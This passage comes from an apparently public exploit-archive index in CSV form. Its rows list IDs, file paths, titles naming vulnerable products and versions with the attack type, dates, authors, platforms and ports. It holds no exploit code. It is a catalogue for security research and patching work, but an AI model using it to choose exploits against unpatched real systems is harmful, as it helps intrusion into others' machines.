Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,php,remote,80 -34002,exploits/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",windows,remote, -34009,exploits/windows/remote/34009.rb,"Yokogawa CS3000 - 'BKFSim_vhfd.exe' Remote Buffer Overflow (Metasploit)",2014-07-08,Metasploit,windows,remote,20010 -34013,exploits/windows/remote/34013.txt,"McAfee Email Gateway 6.7.1 - 'systemWebAdminConfig.do' Remote Security Bypass",2010-05-19,"Nahuel Grisolia",windows,remote, -34018,exploits/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 Firmware - 'setup_ddns.exe' HTML Injection",2010-05-20,SH4V,hardware,remote, -34026,exploits/linux/remote/34026.py,"OpenVAS Manager 4.0 - Authentication Bypass (PoC)",2014-07-10,EccE,linux,remote, -34033,exploits/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 - Multiple Security Bypass / Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote, -34047,exploits/windows/remote/34047.html,"Home FTP Server 1.10.3 (build 144) - Cross-Site Request Forgery",2010-05-26,"John Leitch",windows,remote, -34048,exploits/multiple/remote/34048.html,"Brekeke PBX 2.4.4.8 - 'pbx/gate' Cross-Site Request Forgery",2010-05-26,"John Leitch",multiple,remote, -34050,exploits/windows/remote/34050.py,"Home FTP Server 1.10.2.143 - Directory Traversal",2010-05-27,"John Leitch",windows,remote, -34059,exploits/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET (SEH)",2014-07-14,"Revin Hadi Saputra",windows,remote, -34063,exploits/hardware/remote/34063.rb,"D-Link Devices - 'info.cgi' POST Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80 -34064,exploits/hardware/remote/34064.rb,"D-Link HNAP - Request Remote Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80 -34065,exploits/hardware/remote/34065.rb,"D-Link Devices - Unauthenticated UPnP M-SEARCH Multicast Command Injection (Metasploit)",2014-07-14,Metasploit,hardware,remote,1900 -34066,exploits/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote, -34088,exploits/android/remote/34088.html,"Boat Browser 8.0/8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote, -34156,exploits/windows/remote/34156.pl,"TurboFTP Server 1.20.745 - Directory Traversal",2010-06-17,leinakesi,windows,remote, -34115,exploits/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 - 'page' Cross-Site Scripting",2010-06-07,"Adam Baldwin",windows,remote, -34126,exploits/windows/remote/34126.txt,"Microsoft Help and Support Center - '/sysinfo/sysinfomain.htm' Cross-Site Scripting",2010-06-10,"Tavis Ormandy",windows,remote, -34132,exploits/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443 -34152,exploits/linux/remote/34152.txt,"CUPS 1.4.2 - Web Interface Information Disclosure",2010-06-15,"Luca Carettoni",linux,remote, -34160,exploits/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution",2014-07-24,LiquidWorm,php,remote,80 -34363,exploits/multiple/remote/34363.rb,"Mozilla Firefox - toString console.time Privileged JavaScript Injection (Metasploit)",2014-08-19,Metasploit,multiple,remote, -34174,exploits/windows/remote/34174.txt,"Enemy Territory: Quake Wars 1.5.12642.33243 - Remote Buffer Overflow",2010-08-18,"Luigi Auriemma",windows,remote, -34178,exploits/windows/remote/34178.txt,"id Software id Tech 4 Engine - 'idGameLocal::GetGameStateObject()' Remote Code Execution",2010-07-21,"Luigi Auriemma",windows,remote, -34182,exploits/hardware/remote/34182.txt,"Linksys WAP54Gv3 Wireless Router - 'debug.cgi' Cross-Site Scripting",2010-06-23,"Cristofaro Mune",hardware,remote, -34184,exploits/hardware/remote/34184.txt,"Trend Micro Interscan Web Security Virtual Appliance - Multiple Vulnerabilities",2010-06-14,"Ivan Huertas",hardware,remote, -34186,exploits/multiple/remote/34186.txt,"Apache Axis2 1.x - '/axis2/axis2-admin' Session Fixation",2010-06-23,"Tiago Ferreira Barbosa",multiple,remote, -34191,exploits/php/remote/34191.py,"Oxwall 1.7.0 - Remote Code Execution",2014-07-28,LiquidWorm,php,remote,80 -34192,exploits/linux/remote/34192.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow",2010-06-22,"Martin Barbella",linux,remote, -34200,exploits/hardware/remote/34200.txt,"Cisco Adaptive Security Response - HTTP Response Splitting",2010-06-25,"Daniel King",hardware,remote, -34201,exploits/linux/remote/34201.txt,"feh 1.7 - '--wget-Timestamp' Remote Code Execution",2010-06-25,anonymous,linux,remote, -34208,exploits/hardware/remote/34208.txt,"D-Link DAP-1160 Wireless Access Point - DCC Protocol Security Bypass",2010-06-28,"Cristofaro Mune",hardware,remote, -34230,exploits/windows/remote/34230.txt,"Freewebscriptz Online Games Login - Multiple SQL Injections",2009-12-31,"Hussin X",windows,remote, -34362,exploits/linux/remote/34362.rb,"Gitlab-shell - Code Execution (Metasploit)",2014-08-19,Metasploit,linux,remote,443 -34271,exploits/multiple/remote/34271.txt,"id Software id Tech 4 Engine - 'key' Packet Remote Code Execution",2010-07-05,"Luigi Auriemma",multiple,remote, -34297,exploits/multiple/remote/34297.txt,"dotDefender - Cross-Site Scripting Security Bypass",2010-07-09,SH4V,multiple,remote, -34301,exploits/multiple/remote/34301.txt,"Asterisk Recording Interface 0.7.15/0.10 - Multiple Vulnerabilities",2010-07-12,TurboBorland,multiple,remote, -34310,exploits/multiple/remote/34310.txt,"Oracle Business Process Management 10.3.2 - Cross-Site Scripting",2010-07-13,Markot,multiple,remote, -34312,exploits/multiple/remote/34312.txt,"Oracle WebLogic Server 10.3.3 - Encoded URL",2010-07-13,"Timothy D. Morgan",multiple,remote, -34316,exploits/hardware/remote/34316.txt,"Juniper Networks SA2000 SSL VPN Appliance - 'welcome.cgi' Cross-Site Scripting",2010-06-09,"Richard Brain",hardware,remote, -34335,exploits/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 - 'vmtadmin.cgi' Remote Command Execution (Metasploit)",2014-08-14,Metasploit,linux,remote,80 -34334,exploits/win_x86-64/remote/34334.rb,"Oracle VM VirtualBox 4.3.6 - 3D Acceleration Virtual Machine Escape (Metasploit)",2014-08-14,Metasploit,win_x86-64,remote, -34594,exploits/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate - Arbitrary File Upload (Metasploit)",2014-09-09,Metasploit,windows,remote,8020 -34358,exploits/linux/remote/34358.txt,"Mozilla Firefox and SeaMonkey Plugin Parameters - Remote Buffer Overflow",2010-07-20,J23,linux,remote, -34369,exploits/multiple/remote/34369.txt,"IBM Java - UTF8 Byte Sequences Security Bypass",2010-07-23,IBM,multiple,remote, -34372,exploits/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection",2009-11-01,"Davide Canali",multiple,remote, -34465,exploits/hardware/remote/34465.txt,"F5 Big-IP - Unauthenticated rsync Access",2014-08-29,Security-Assessment.com,hardware,remote,22 -34385,exploits/linux/remote/34385.txt,"KVIrc 4.0 - '\r' Carriage Return in DCC Handshake Remote Command Execution",2010-07-28,unic0rn,linux,remote, -34390,exploits/php/remote/34390.rb,"HybridAuth - 'install.php' PHP Code Execution (Metasploit)",2014-08-21,Metasploit,php,remote,80 -34399,exploits/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",ios,remote, -34426,exploits/linux/remote/34426.txt,"uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection",2010-08-05,Chuzz,linux,remote, -34431,exploits/linux/remote/34431.html,"Nagios XI - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote, -34437,exploits/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision",2010-08-11,"Florian Zumbiehl",windows,remote, -34439,exploits/multiple/remote/34439.txt,"ServletExec - Directory Traversal / Authentication Bypass",2010-08-12,"Stefano Di Paola",multiple,remote, -34448,exploits/multiple/remote/34448.rb,"Mozilla Firefox - WebIDL Privileged JavaScript Injection (Metasploit)",2014-08-28,Metasploit,multiple,remote, -34461,exploits/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution",2014-08-29,"Claudio Viviani",multiple,remote, -34462,exploits/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass",2010-08-13,"Emmanuel Bouillon",windows,remote, -34478,exploits/windows/remote/34478.html,"Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass",2010-08-16,"Mario Heiderich",windows,remote, -40339,exploits/linux/remote/40339.py,"glibc - 'getaddrinfo' Stack Based Buffer Overflow",2016-09-06,SpeeDr00t,linux,remote, -34500,exploits/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,multiple,remote, -34507,exploits/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote, -34517,exploits/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution (Metasploit)",2014-09-01,Metasploit,windows,remote,5466 -34523,exploits/multiple/remote/34523.txt,"Nagios XI - 'users.php' SQL Injection",2010-08-24,"Adam Baldwin",multiple,remote, -34532,exploits/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Executions",2010-08-25,storm,windows,remote, -34542,exploits/windows/remote/34542.c,"UltraVNC 1.0.8.2 - DLL Loading Arbitrary Code Execution",2010-08-30,"Ivan Markovic",windows,remote, -34595,exploits/linux/remote/34595.py,"ALCASAR 2.8 - Remote Code Execution",2014-09-09,eF,linux,remote,80 -34621,exploits/unix/remote/34621.c,"Mozilla Firefox 3.6.8 - 'Math.random()' Cross Domain Information Disclosure",2010-09-14,"Amit Klein",unix,remote, -34622,exploits/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",windows,remote, -34647,exploits/windows/remote/34647.txt,"Ammyy Admin 3.5 - Remote Code Execution (Metasploit)",2014-09-13,scriptjunkie,windows,remote, -34654,exploits/windows/remote/34654.c,"SWiSH Max3 - DLL Loading Arbitrary Code Execution",2010-09-20,anT!-Tr0J4n,windows,remote, -34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",windows,remote,80 -34669,exploits/multiple/remote/34669.rb,"Railo 4.2.1 - Remote File Inclusion (Metasploit)",2014-09-15,Metasploit,multiple,remote,80 -34670,exploits/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer - Arbitrary File Upload (Metasploit)",2014-09-15,Metasploit,multiple,remote,8400 -34671,exploits/java/remote/34671.rb,"SolarWinds Storage Manager - Authentication Bypass (Metasploit)",2014-09-15,Metasploit,java,remote,9000 -34685,exploits/windows/remote/34685.py,"Basic Web Server 1.0 - Directory Traversal / Denial of Service",2010-09-19,"John Leitch",windows,remote, -34686,exploits/windows/remote/34686.txt,"YelloSoft Pinky 1.0 - Directory Traversal",2010-09-16,"John Leitch",windows,remote, -34691,exploits/multiple/remote/34691.txt,"CollabNet Subversion Edge Log Parser - HTML Injection",2010-09-21,"Sumit Kumar Soni",multiple,remote, -34695,exploits/windows/remote/34695.c,"GreenBrowser - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,windows,remote, -34696,exploits/windows/remote/34696.c,"Easy Office Recovery - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,windows,remote, -34697,exploits/windows/remote/34697.c,"Sothink SWF Decompiler - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,windows,remote, -34821,exploits/windows/remote/34821.txt,"Installshield 2009 15.0.0.53 Premier - 'ISWiAutomation15.dll' ActiveX Arbitrary File Overwrite",2009-09-15,the_Edit0r,windows,remote, -34823,exploits/windows/remote/34823.c,"Dupehunter Professional 9.0.0.3911 - 'Fwpuclnt.dll' DLL Loading Arbitrary Code Execution",2010-10-08,anT!-Tr0J4n,windows,remote, -34756,exploits/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 - Command Injection (Metasploit)",2014-09-24,Metasploit,windows,remote,3000 -34757,exploits/windows/remote/34757.rb,"Advantech Webaccess - dvs.ocx GetColor Buffer Overflow (Metasploit)",2014-09-24,Metasploit,windows,remote, -34765,exploits/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (Shellshock)",2014-09-25,"Stephane Chazelas",linux,remote, -34766,exploits/linux/remote/34766.php,"Bash - Environment Variables Command Injection (Shellshock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80 -34768,exploits/windows/remote/34768.c,"VirIT eXplorer 6.7.43 - 'tg-scan.dll' DLL Loading Arbitrary Code Execution",2010-09-27,anT!-Tr0J4n,windows,remote, -34777,exploits/cgi/remote/34777.rb,"GNU Bash - Environment Variable Command Injection (Metasploit)",2014-09-25,"Shaun Colley",cgi,remote, -34796,exploits/multiple/remote/34796.txt,"Oracle MySQL < 5.1.50 - Privilege Escalation",2010-08-03,"Libing Song",multiple,remote, -34802,exploits/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure",2010-10-04,"599eme Man",hardware,remote, -34815,exploits/windows/remote/34815.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)",2014-09-29,"ryujin & sickness",windows,remote, -34829,exploits/windows/remote/34829.c,"Adobe Dreamweaver CS4 - 'mfc80esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,windows,remote, -34830,exploits/windows/remote/34830.c,"IsoBuster 2.7 - 'wnaspi32.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,windows,remote, -34831,exploits/windows/remote/34831.c,"NetStumbler 0.4 - 'mfc71esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,windows,remote, -34832,exploits/windows/remote/34832.c,"Microsoft Visio 2007 - 'mfc80esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,windows,remote, -34835,exploits/windows/remote/34835.py,"e2eSoft VCam - DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,windows,remote, -34836,exploits/windows/remote/34836.py,"Notepad++ 5.8.2 - 'libtidy.dll' DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,windows,remote, -34838,exploits/windows/remote/34838.c,"Torrent DVD Creator - 'quserex.dll' DLL Loading Arbitrary Code Execution",2010-10-13,anT!-Tr0J4n,windows,remote, -34844,exploits/windows/remote/34844.c,"STDU Explorer 1.0.201 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-10-15,anT!-Tr0J4n,windows,remote, -34846,exploits/windows/remote/34846.txt,"httpdx 1.4.5 - dot Character Remote File Disclosure",2009-10-09,Dr_IDE,windows,remote, -34848,exploits/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote, -34853,exploits/windows/remote/34853.c,"PowerDVD 5.0.1107 - 'trigger.dll' DLL Loading Arbitrary Code Execution",2010-10-19,"Inj3cti0n P4ck3t",windows,remote, -34856,exploits/windows/remote/34856.py,"Kolibri WebServer 2.0 - Remote Buffer Overflow (EMET 5.0 / EMET 4.1 Partial Bypass)",2014-10-02,tekwizz123,windows,remote,80 -34860,exploits/linux/remote/34860.py,"GNU bash 4.3.11 - Environment Variable dhclient",2014-10-02,@0x00string,linux,remote, -34862,exploits/linux/remote/34862.rb,"Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit)",2014-10-02,Metasploit,linux,remote,21 -34866,exploits/linux/remote/34866.rb,"HP Network Node Manager I - PMD Buffer Overflow (Metasploit)",2014-10-02,Metasploit,linux,remote,7426 -34867,exploits/java/remote/34867.rb,"ManageEngine OpManager / Social IT - Arbitrary File Upload (Metasploit)",2014-10-02,"Pedro Ribeiro",java,remote,80 -34868,exploits/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 - DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote, -34869,exploits/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote, -34870,exploits/windows/remote/34870.html,"VideoLAN VLC Media Player 1.1.4 Mozilla MultiMedia Plugin - Remote Code Execution",2010-10-19,shinnai,windows,remote, -34879,exploits/linux/remote/34879.txt,"OpenVPN 2.2.29 - Remote Command Injection (Shellshock)",2014-10-04,"hobbily plunt",linux,remote, -34881,exploits/linux/remote/34881.html,"Mozilla Firefox SeaMonkey 3.6.10 / Thunderbird 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",linux,remote, -34896,exploits/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Command Injection (Shellshock)",2014-10-06,"Phil Blank",linux,remote, -34900,exploits/linux/remote/34900.py,"Apache mod_cgi - Remote Command Injection (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote, -34925,exploits/php/remote/34925.rb,"WordPress Plugin InfusionSoft - Arbitrary File Upload (Metasploit)",2014-10-09,Metasploit,php,remote,80 -34926,exploits/windows/remote/34926.rb,"Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,windows,remote,80 -34927,exploits/unix/remote/34927.rb,"F5 iControl - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,unix,remote,443 -34931,exploits/windows/remote/34931.c,"Microsoft Windows Vista - 'lpksetup.exe oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",windows,remote, -34932,exploits/linux/remote/34932.html,"NitroView ESM - 'ess.pm' Remote Command Execution",2010-10-26,s_n,linux,remote, -34943,exploits/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",windows,remote, -34945,exploits/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 - Directory Traversal",2010-11-01,"John Leitch",multiple,remote, -34949,exploits/multiple/remote/34949.py,"BroadWorks - Call Detail Record Security Bypass",2010-11-02,"Nick Freeman",multiple,remote, -34950,exploits/php/remote/34950.php,"PHP 5.3.2 - 'xml_utf8_decode()' UTF-8 Input Validation",2009-05-11,root@80sec.com,php,remote, -34952,exploits/multiple/remote/34952.txt,"Apache Shiro - Directory Traversal",2010-11-02,"Luke Taylor",multiple,remote, -34978,exploits/windows/remote/34978.c,"Silo 2.1.1 - 'wintab32.dll' DLL Loading Arbitrary Code Execution",2010-11-08,"Gjoko Krstic",windows,remote, -34979,exploits/php/remote/34979.php,"PHP 5.3.x - 'mb_strcut()' Information Disclosure",2010-11-07,"Mateusz Kocielski",php,remote, -34985,exploits/php/remote/34985.txt,"pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-05,"dave b",php,remote, -34986,exploits/hardware/remote/34986.txt,"D-Link DIR-300 - Multiple Security Bypass Vulnerabilities",2010-11-09,"Karol Celia",hardware,remote, -34997,exploits/windows/remote/34997.txt,"DServe - Multiple Cross-Site Scripting Vulnerabilities",2010-11-16,Axiell,windows,remote, -34998,exploits/linux/remote/34998.txt,"Eclipse 3.6.1 - Help Server 'help/index.jsp' Cross-Site Scripting",2010-11-16,"Aung Khant",linux,remote, -34999,exploits/linux/remote/34999.txt,"Eclipse 3.6.1 - Help Server 'help/advanced/content.jsp' Cross-Site Scripting",2010-11-16,"Aung Khant",linux,remote, -35001,exploits/windows/remote/35001.txt,"SAP NetWeaver 7.0 - SQL Monitor Multiple Cross-Site Scripting Vulnerabilities",2010-11-17,a.polyakov,windows,remote, -35002,exploits/windows/remote/35002.html,"VideoLAN VLC Media Player 1.1.x - Calling Convention Remote Buffer Overflow",2010-11-02,shinnai,windows,remote, -35003,exploits/multiple/remote/35003.txt,"IBM OmniFind - 'command' Cross-Site Scripting",2010-11-09,"Fatih Kilic",multiple,remote, -35005,exploits/windows/remote/35005.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote, -35006,exploits/windows/remote/35006.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote, -35007,exploits/windows/remote/35007.c,"Native Instruments (Multiple Products) - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote, -35011,exploits/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote, -35014,exploits/hardware/remote/35014.txt,"D-Link DIR-300 - WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",hardware,remote, -35018,exploits/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - 'tcp_test' Length Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote, -35032,exploits/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService - Arbitrary File Upload (Metasploit)",2014-10-21,Metasploit,windows,remote, -35033,exploits/php/remote/35033.rb,"Joomla! Component Akeeba Kickstart - Unserialize Remote Code Execution (Metasploit)",2014-10-21,Metasploit,php,remote,80 -35034,exploits/multiple/remote/35034.rb,"HP Data Protector - 'EXEC_INTEGUTIL' Remote Code Execution (Metasploit)",2014-10-21,Metasploit,multiple,remote,5555 -35051,exploits/windows/remote/35051.txt,"Freefloat FTP Server - Directory Traversal",2010-12-06,Pr0T3cT10n,windows,remote, -35055,exploits/windows/remote/35055.py,"Microsoft Windows - OLE Remote Code Execution 'Sandworm' (MS14-060)",2014-10-25,"Mike Czumak",windows,remote, -35062,exploits/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow",2010-12-07,"Luigi Auriemma",multiple,remote, -35068,exploits/hardware/remote/35068.txt,"pfSense - 'pkg_edit.php?id' Cross-Site Scripting",2010-11-08,"dave b",hardware,remote, -35069,exploits/hardware/remote/35069.txt,"pfSense - 'pkg.php?xml' Cross-Site Scripting",2010-11-08,"dave b",hardware,remote, -35070,exploits/hardware/remote/35070.txt,"pfSense - 'status_graph.php?if' Cross-Site Scripting",2010-11-08,"dave b",hardware,remote, -35071,exploits/hardware/remote/35071.txt,"pfSense - 'interfaces.php?if' Cross-Site Scripting",2010-11-08,"dave b",hardware,remote, -35078,exploits/unix/remote/35078.rb,"Centreon - SQL Injection / Command Injection (Metasploit)",2014-10-27,Metasploit,unix,remote,80 -35092,exploits/multiple/remote/35092.html,"Helix Server 14.0.1.571 - Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",multiple,remote, -35095,exploits/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote, -35103,exploits/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass",2014-10-29,gamehacker,hardware,remote, -35115,exploits/linux/remote/35115.rb,"CUPS Filter - Bash Environment Variable Code Injection (Metasploit)",2014-10-29,Metasploit,linux,remote,631 -35119,exploits/windows/remote/35119.txt,"Alt-N WebAdmin 3.3.3 - Remote Source Code Information Disclosure",2010-12-17,wsn1983,windows,remote, -35130,exploits/windows/remote/35130.txt,"Calibre 0.7.34 - Cross-Site Scripting / Directory Traversal",2010-12-21,waraxe,windows,remote, -35132,exploits/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) - Arbitrary Shell Command Injection",2010-12-21,"Jan Fry",linux,remote, -35144,exploits/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 - Cross-Site Scripting",2010-12-23,"Gjoko Krstic",multiple,remote, -35148,exploits/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for E-Business - Directory Traversal",2010-12-24,anonymous,linux,remote, -35151,exploits/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) - 'Patch' DLM (Metasploit)",2014-11-03,Metasploit,hardware,remote,9100 -35166,exploits/windows/remote/35166.c,"Ace Video Workshop 1.2.0.0 - 'ir50_lcs.dll' DLL Loading Arbitrary Code Execution",2011-01-03,d3c0der,windows,remote, -35170,exploits/hardware/remote/35170.txt,"Lexmark X651de - Printer Ready Message Value HTML Injection",2011-01-06,"dave b",hardware,remote, -35171,exploits/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Executions",2011-01-05,d3c0der,windows,remote, -35180,exploits/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,bsd,remote, -35183,exploits/php/remote/35183.rb,"X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80 -35184,exploits/hardware/remote/35184.py,"Belkin N750 - 'jump?login' Remote Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080 -35188,exploits/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote, -35190,exploits/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote, -35211,exploits/java/remote/35211.rb,"Visual Mining NetCharts Server - Remote Code Execution (Metasploit)",2014-11-10,Metasploit,java,remote,8001 -35225,exploits/windows/remote/35225.c,"Avira AntiVir Personal - Multiple Code Execution Vulnerabilities (1)",2011-01-14,D.Elser,windows,remote, -35226,exploits/windows/remote/35226.py,"Avira AntiVir Personal - Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote, -35229,exploits/windows/remote/35229.html,"Microsoft Internet Explorer 11 - OLE Automation Array Remote Code Execution (1)",2014-11-13,yuange,windows,remote, -35230,exploits/windows/remote/35230.rb,"Microsoft Internet Explorer < 11 - OLE Automation Array Remote Code Execution (Metasploit)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote, -35232,exploits/linux/remote/35232.txt,"Pango Font Parsing - 'pangoft2-render.c' Heap Corruption",2011-01-18,"Dan Rosenberg",linux,remote, -35241,exploits/windows/remote/35241.pl,"ESTsoft ALZip 8.12.0.3 - '.zip' Remote Buffer Overflow",2011-01-19,"C4SS!0 G0M3S",windows,remote, -35242,exploits/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE - 'Help Server help/advanced/searchView.jsp?SearchWord' Cross-Site Scripting",2008-04-24,Rob,multiple,remote, -35243,exploits/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE - 'Help Server help/advanced/workingSetManager.jsp?workingSet' Cross-Site Scripting",2008-04-24,Rob,multiple,remote, -35252,exploits/multiple/remote/35252.php,"libxml2 2.6.x - 'XMLWriter::writeAttribute()' Memory Leak Information Disclosure",2011-01-24,"Kees Cook",multiple,remote, -35273,exploits/windows/remote/35273.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.1 Bypass) (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote, -35284,exploits/multiple/remote/35284.pl,"Opera Web Browser 11.00 - 'option' HTML Element Integer Overflow",2011-01-25,"C4SS!0 G0M3S",multiple,remote, -35280,exploits/windows/remote/35280.txt,".NET Remoting Services - Remote Command Execution",2014-11-17,"James Forshaw",windows,remote, -35282,exploits/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser - Remote Code Execution (Metasploit)",2014-11-18,Metasploit,android,remote, -35283,exploits/php/remote/35283.rb,"MantisBT XmlImportExport Plugin - PHP Code Injection (Metasploit)",2014-11-18,Metasploit,php,remote,80 -35308,exploits/windows/remote/35308.html,"Microsoft Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / PowerShell VirtualAlloc (MS14-064)",2014-11-20,"GradiusX & b33f",windows,remote, -35314,exploits/linux/remote/35314.txt,"Wireshark 1.4.3 - '.pcap' Memory Corruption",2011-02-03,"Huzaifa Sidhpurwala",linux,remote, -35316,exploits/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management - Authentication Bypass",2011-02-04,"Zack Fasel & Matthew Jakubowski",multiple,remote, -35317,exploits/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products - Information Disclosure",2011-02-07,Rapid7,hardware,remote, -35318,exploits/windows/remote/35318.c,"Cain & Abel 2.7.3 - 'dagc.dll' DLL Loading Arbitrary Code Execution",2011-02-07,d3c0der,windows,remote, -35380,exploits/php/remote/35380.rb,"Pandora Fms - SQL Injection Remote Code Execution (Metasploit)",2014-11-26,Metasploit,php,remote,80 -40431,exploits/hardware/remote/40431.txt,"NetMan 204 - Backdoor Account",2016-09-27,"Saeed reza Zamanian",hardware,remote, -35352,exploits/multiple/remote/35352.rb,"Ruby on Rails 3.0.5 - 'WEBrick::HTTPRequest' Module HTTP Header Injection",2011-02-16,"Jimmy Bandit",multiple,remote, -35356,exploits/linux/remote/35356.rb,"Hikvision DVR - RTSP Request Remote Code Execution (Metasploit)",2014-11-24,Metasploit,linux,remote,554 -35364,exploits/multiple/remote/35364.txt,"IBM Lotus Sametime - '/stconf.nsf/WebMessage?messageString' Cross-Site Scripting",2011-02-21,"Dave Daly",multiple,remote, 